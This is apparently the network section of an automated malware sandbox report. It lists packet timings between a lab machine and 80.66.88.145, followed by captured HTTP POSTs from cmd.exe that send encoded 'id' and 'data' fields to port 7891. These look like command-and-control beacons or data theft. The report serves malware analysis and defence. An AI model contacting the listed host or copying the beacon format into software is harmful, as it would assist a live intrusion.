                                                        Jul 26, 2023 14:02:36.136826038 CEST99994975080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:36.649499893 CEST497509999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:36.686093092 CEST99994975080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:37.196211100 CEST497509999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:37.229655981 CEST99994975080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:37.337593079 CEST497519999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:39.620198011 CEST497527891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:39.653781891 CEST78914975280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:39.654047966 CEST497527891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:39.654381037 CEST497527891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:39.692779064 CEST78914975280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:39.692819118 CEST78914975280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:39.692956924 CEST78914975280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:39.693094015 CEST497527891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:39.693365097 CEST497527891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:39.728326082 CEST78914975280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:40.352741957 CEST497519999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:40.386250973 CEST99994975180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:40.899712086 CEST497519999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:40.933315992 CEST99994975180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:41.040843010 CEST497539999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:41.074475050 CEST99994975380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:41.587260962 CEST497539999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:41.622248888 CEST99994975380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:42.134139061 CEST497539999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:42.167613983 CEST99994975380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:42.275989056 CEST497549999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:42.309483051 CEST99994975480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:42.821827888 CEST497549999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:42.855139017 CEST99994975480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:43.368714094 CEST497549999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:43.402471066 CEST99994975480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:43.527946949 CEST497559999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:43.568320990 CEST99994975580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:43.770831108 CEST497567891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:43.804240942 CEST78914975680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:43.804418087 CEST497567891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:43.805619955 CEST497567891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:43.841614008 CEST78914975680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:43.841784954 CEST78914975680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:43.841869116 CEST497567891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:43.842031002 CEST78914975680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:43.842118979 CEST497567891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:43.877747059 CEST497567891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:43.911094904 CEST78914975680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:44.071958065 CEST497559999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:44.118309021 CEST99994975580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:44.618740082 CEST497559999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:44.652188063 CEST99994975580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:45.498558998 CEST497579999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:45.531680107 CEST99994975780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:46.040734053 CEST497579999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:46.074255943 CEST99994975780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:46.587702990 CEST497579999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:46.621167898 CEST99994975780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:47.111028910 CEST497589999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:47.146481037 CEST99994975880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:47.728436947 CEST497589999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:47.766150951 CEST99994975880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:47.901631117 CEST497597891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:47.936496019 CEST78914975980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:47.936595917 CEST497597891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:47.936861038 CEST497597891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:47.971383095 CEST78914975980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:47.971417904 CEST78914975980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:47.971467972 CEST497597891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:47.971584082 CEST78914975980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:47.971628904 CEST497597891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:47.971724987 CEST497597891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:48.032773972 CEST78914975980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:48.337835073 CEST497589999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:48.374144077 CEST99994975880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:48.479933977 CEST497609999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:48.513493061 CEST99994976080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:49.150655031 CEST497609999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:49.192625999 CEST99994976080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:49.837949991 CEST497609999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:49.875628948 CEST99994976080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:49.996001959 CEST497619999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:50.029649019 CEST99994976180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:50.634926081 CEST497619999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:50.668550014 CEST99994976180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:51.232847929 CEST497619999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:51.266727924 CEST99994976180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:51.581634045 CEST497629999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:51.615102053 CEST99994976280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:51.996164083 CEST497637891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:52.029761076 CEST78914976380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:52.029866934 CEST497637891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:52.031584978 CEST497637891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:52.065927029 CEST78914976380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:52.066063881 CEST78914976380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:52.066112041 CEST497637891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:52.066272974 CEST78914976380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:52.066329002 CEST497637891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:52.068185091 CEST497637891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:52.101525068 CEST78914976380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:52.115118980 CEST497629999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:52.152025938 CEST99994976280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:52.664283037 CEST497629999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:52.697704077 CEST99994976280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:52.809106112 CEST497649999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:52.843635082 CEST99994976480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:53.353863001 CEST497649999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:53.396636009 CEST99994976480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:53.900966883 CEST497649999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:53.942759037 CEST99994976480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:54.068190098 CEST497659999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:54.102893114 CEST99994976580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:54.603980064 CEST497659999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:54.637907028 CEST99994976580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:55.150919914 CEST497659999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:55.184473991 CEST99994976580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:55.292439938 CEST497669999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:55.326154947 CEST99994976680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:55.838484049 CEST497669999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:55.871932030 CEST99994976680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:56.090620041 CEST497677891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:56.124300003 CEST78914976780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:56.124440908 CEST497677891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:56.126631021 CEST497677891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:56.160953999 CEST78914976780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:56.161010027 CEST78914976780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:56.161102057 CEST497677891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:56.161130905 CEST78914976780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:56.161950111 CEST497677891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:56.164416075 CEST497677891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:56.199006081 CEST78914976780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:56.385442972 CEST497669999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:56.420970917 CEST99994976680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:56.547276974 CEST497689999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:56.580784082 CEST99994976880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:57.088602066 CEST497689999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:57.123120070 CEST99994976880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:57.635545969 CEST497689999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:57.669370890 CEST99994976880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:57.784326077 CEST497699999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:57.817917109 CEST99994976980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:58.323050022 CEST497699999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:58.356657028 CEST99994976980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:58.870028019 CEST497699999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:58.903669119 CEST99994976980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:03:04.815387011 CEST497707891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:03:04.848939896 CEST78914977080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:03:04.849152088 CEST497707891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:03:04.849220991 CEST497707891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:03:04.883976936 CEST78914977080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:03:04.884015083 CEST78914977080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:03:04.884171963 CEST497707891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:03:04.884275913 CEST497707891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:03:04.884416103 CEST78914977080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:03:04.884478092 CEST497707891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:03:05.183080912 CEST497707891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:03:05.217839956 CEST78914977080.66.88.145192.168.2.4

                                                        HTTP Request Dependency Graph

                                                        • 80.66.88.145:7891

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.44969080.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:01:05.713223934 CEST1OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 658
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 45 79 6c 63 45 37 6c 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 4a 63 45 4f 72 63 25 32 42 4f 6c 61 44 79 6c 63 45 37 43 63 45 4f 72 62 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 34 63 45 4f 6c 61 6f 33 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 61 44 35 6c 63 45 33 72 63 45 4f 72 62 6f 4f 6c 61 44 6b 6c 63 45 37 34 63 45 4f 34 63 45 4f 6c 61 25 32 42 4d 6c 63 45 59 72 63 45 4f 38 61 45 4f 6c 63 44 4f 6c 63 45 78 36 63 45 4f 68 62 45 4f 6c 61 25 32 42 78 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 61 48 6b 6c 63 45 33 58 63 45 4f 72 58 25 32 42 4f 6c 63 44 4f 6c 63 45 6b 6c 63 45 4f 72 63 6f 4f 6c 61 44 59 6c 63 45 66 6d 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 34 63 45 4f 6c 63 48 78 6c 63 45 53 6c 63 45 4f 36 61 6f 4f 6c 61 4b 6b 6c 63 45 6b 34 63 45 4f 43 61 6f 4f 6c 61 45 37 6c 63 45 78 4a 63 45 4f 36 63 25 32 42 4f 6c 61 6f 78 6c 63 45 78 36 63 45 4f 36 63 44 4f 6c 61 45 6b 6c 63 45 78 43 63 45 4f 34 63 45 4f 6c 63 48 78 6c 63 45 53 6c 63 45 4f 36 61 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 33 58 63 45 4f 68 63 45 4f 6c 61 25 32 42 4f 6c 63 45 33 36 63 45 4f 72 61 45 4f 6c 63 44 4f 6c 63 45 37 36 63 45 4f 68 63 25 32 42 4f 6c 61 44 35 6c 63 45 66 50 63 45 4f 72 61 25 32 42 4f 6c 63 44 4f 6c 63 45 41 65 63 45 4f 36 63 25 32 42 4f 6c 61 45 35 6c 63 45 53 6c 63 45 4f 36 61 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 33 58 63 45 4f 68 63 45 4f 6c 61 25 32 42 4f 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 63 44 4f 6c 63 45 33 72 63 45 4f 68 63 44 4f 6c 61 48 33 6c 63 45 66 65 63 45 4f 34 63 45 4f 6c 61 25 32 42 37 6c 63 45 37 68 63 45 4f 68 61 25 32 42 4f 6c 63 48 6b 6c 63 45 33 36 63 45 4f 68 62 45 4f 6c 61 44 6b 6c 63 45 66 65 63 45 4f 68 63 25 32 42 4f 6c 61 44 35 6c 63 45 47 50 63 45 4f 72 63 25 32 42 4f 6c 61 48 33 6c 63 45 66 65 63 45 52 5a 63 66 68 43 25 32 42 44 66 5a 68 53 30 38 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aEylcE7lcEOhcEOlaHYlcE3JcEOrc%2BOlaDylcE7CcEOrboOlaH3lcEfPcEO4cEOlao3lcE36cEOhcDOlaD5lcE3rcEOrboOlaDklcE74cEO4cEOla%2BMlcEYrcEO8aEOlcDOlcEx6cEOhbEOla%2BxlcE36cEOhcDOlaHklcE3XcEOrX%2BOlcDOlcEklcEOrcoOlaDYlcEfmcEOrcoOlaD7lcE36cEO4cEOlcHxlcESlcEO6aoOlaKklcEk4cEOCaoOlaE7lcExJcEO6c%2BOlaoxlcEx6cEO6cDOlaEklcExCcEO4cEOlcHxlcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOraEOlcDOlcE76cEOhc%2BOlaD5lcEfPcEOra%2BOlcDOlcEAecEO6c%2BOlaE5lcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOhcDOlcDOlcE3rcEOhcDOlaH3lcEfecEO4cEOla%2B7lcE7hcEOha%2BOlcHklcE36cEOhbEOlaDklcEfecEOhc%2BOlaD5lcEGPcEOrc%2BOlaH3lcEfecERZcfhC%2BDfZhS08nz&act=1000
                                                        Jul 26, 2023 14:01:05.789221048 CEST1INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 4
                                                        Date: Wed, 26 Jul 2023 12:01:05 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.44969280.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:01:05.844060898 CEST3OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1054
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 45 79 6c 63 45 37 6c 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 4a 63 45 4f 72 63 25 32 42 4f 6c 61 44 79 6c 63 45 37 43 63 45 4f 72 62 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 34 63 45 4f 6c 61 6f 33 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 61 44 35 6c 63 45 33 72 63 45 4f 72 62 6f 4f 6c 61 44 6b 6c 63 45 37 34 63 45 4f 34 63 45 4f 6c 61 25 32 42 4d 6c 63 45 59 72 63 45 4f 38 61 45 4f 6c 63 44 4f 6c 63 45 78 36 63 45 4f 68 62 45 4f 6c 61 25 32 42 78 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 61 48 6b 6c 63 45 33 58 63 45 4f 72 58 25 32 42 4f 6c 63 44 4f 6c 63 45 6b 6c 63 45 4f 72 63 6f 4f 6c 61 44 59 6c 63 45 66 6d 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 34 63 45 4f 6c 63 48 78 6c 63 45 53 6c 63 45 4f 36 61 6f 4f 6c 61 4b 6b 6c 63 45 6b 34 63 45 4f 43 61 6f 4f 6c 61 45 37 6c 63 45 78 4a 63 45 4f 36 63 25 32 42 4f 6c 61 6f 78 6c 63 45 78 36 63 45 4f 36 63 44 4f 6c 61 45 6b 6c 63 45 78 43 63 45 4f 34 63 45 4f 6c 63 48 78 6c 63 45 53 6c 63 45 4f 36 61 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 33 58 63 45 4f 68 63 45 4f 6c 61 25 32 42 4f 6c 63 45 33 36 63 45 4f 72 61 45 4f 6c 63 44 4f 6c 63 45 37 36 63 45 4f 68 63 25 32 42 4f 6c 61 44 35 6c 63 45 66 50 63 45 4f 72 61 25 32 42 4f 6c 63 44 4f 6c 63 45 41 65 63 45 4f 36 63 25 32 42 4f 6c 61 45 35 6c 63 45 53 6c 63 45 4f 36 61 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 33 58 63 45 4f 68 63 45 4f 6c 61 25 32 42 4f 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 63 44 4f 6c 63 45 33 72 63 45 4f 68 63 44 4f 6c 61 48 33 6c 63 45 66 65 63 45 4f 34 63 45 4f 6c 61 25 32 42 37 6c 63 45 37 68 63 45 4f 68 61 25 32 42 4f 6c 63 48 6b 6c 63 45 33 36 63 45 4f 68 62 45 4f 6c 61 44 6b 6c 63 45 66 65 63 45 4f 68 63 25 32 42 4f 6c 61 44 35 6c 63 45 47 50 63 45 4f 72 63 25 32 42 4f 6c 61 48 33 6c 63 45 66 65 63 45 52 5a 63 66 72 56 44 6e 41 46 44 37 74 30 25 33 44 59 52 79 44 77 47 46 25 33 44 51 41 39 25 33 44 6f 53 64 58 61 52 4c 54 45 33 72 63 45 4f 64 58 37 4f 34 25 32 42 44 78 6c 54 4b 45 70 76 42 52 32 54 45 78 64 58 62 44 34 6a 47 6f 5a 61 4b 78 6c 63 45 33 4a 63 45 4f 72 63 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 66 52 63 45 4f 68 63 25 32 42 4f 6c 61 48 33 6c 63 45 33 72 63 45 4f 68 61 45 4f 6c 63 44 4f 6c 63 45 78 34 63 45 4f 72 63 6f 4f 6c 61 25 32 42 59 6c 63 45 33 4a 63 45 4f 72 63 25 32 42 4f 6c 63 44 4f 6c 63 45 78 43 63 45 4f 72 62 6f 4f 6c 61 25 32 42 59 6c 63 45 37 6c 63 45 4f 72 58 25 32 42 4f 6c 61 44 79 6c 63 45 37 4a 63 45 4f 34 63 45 4f 6c 61 45 79 6c 63 45 33 43 63 45 4f 72 63 6f 4f 6c 61 25 32 42 4f 6c 63 45 37 43 63 45 4f 72 61 6f 4f 6c 61 25 32 42 53 6c 63 66 68 6a 63 6f 35 58 54 4b 34 6d 6e 51 45 54 44 76 41 62 5a 77 59 64 63 6f 4f 64 36 66 47 62 54 37 52 6a 61 44 78 64 58 6e 30 54 44 33 78 64 63 6f 37 58 63 25 32 42 41 5a 68 53 30 38 6e 66 68 58 61 44 35 6c 63 25 32 42 4d 6c 63 45 33 34 6e 51 30 77 42 62 6e 62 5a 62 6e 5a 61 37 76 72 6e 45 52 5a 63 66 68 68 62 45 35 58 26 61 63 74 3d 31 30 30 31
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaEylcE7lcEOhcEOlaHYlcE3JcEOrc%2BOlaDylcE7CcEOrboOlaH3lcEfPcEO4cEOlao3lcE36cEOhcDOlaD5lcE3rcEOrboOlaDklcE74cEO4cEOla%2BMlcEYrcEO8aEOlcDOlcEx6cEOhbEOla%2BxlcE36cEOhcDOlaHklcE3XcEOrX%2BOlcDOlcEklcEOrcoOlaDYlcEfmcEOrcoOlaD7lcE36cEO4cEOlcHxlcESlcEO6aoOlaKklcEk4cEOCaoOlaE7lcExJcEO6c%2BOlaoxlcEx6cEO6cDOlaEklcExCcEO4cEOlcHxlcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOraEOlcDOlcE76cEOhc%2BOlaD5lcEfPcEOra%2BOlcDOlcEAecEO6c%2BOlaE5lcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOhcDOlcDOlcE3rcEOhcDOlaH3lcEfecEO4cEOla%2B7lcE7hcEOha%2BOlcHklcE36cEOhbEOlaDklcEfecEOhc%2BOlaD5lcEGPcEOrc%2BOlaH3lcEfecERZcfrVDnAFD7t0%3DYRyDwGF%3DQA9%3DoSdXaRLTE3rcEOdX7O4%2BDxlTKEpvBR2TExdXbD4jGoZaKxlcE3JcEOrc%2BOla%2BSlcEfRcEOhc%2BOlaH3lcE3rcEOhaEOlcDOlcEx4cEOrcoOla%2BYlcE3JcEOrc%2BOlcDOlcExCcEOrboOla%2BYlcE7lcEOrX%2BOlaDylcE7JcEO4cEOlaEylcE3CcEOrcoOla%2BOlcE7CcEOraoOla%2BSlcfhjco5XTK4mnQETDvAbZwYdcoOd6fGbT7RjaDxdXn0TD3xdco7Xc%2BAZhS08nfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
                                                        Jul 26, 2023 14:01:05.880832911 CEST3INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:01:05 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        10192.168.2.44972180.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:02:05.239020109 CEST52OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Jul 26, 2023 14:02:05.273132086 CEST53INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 4
                                                        Date: Wed, 26 Jul 2023 12:02:05 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        11192.168.2.44972280.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:02:05.335280895 CEST54OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 520
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 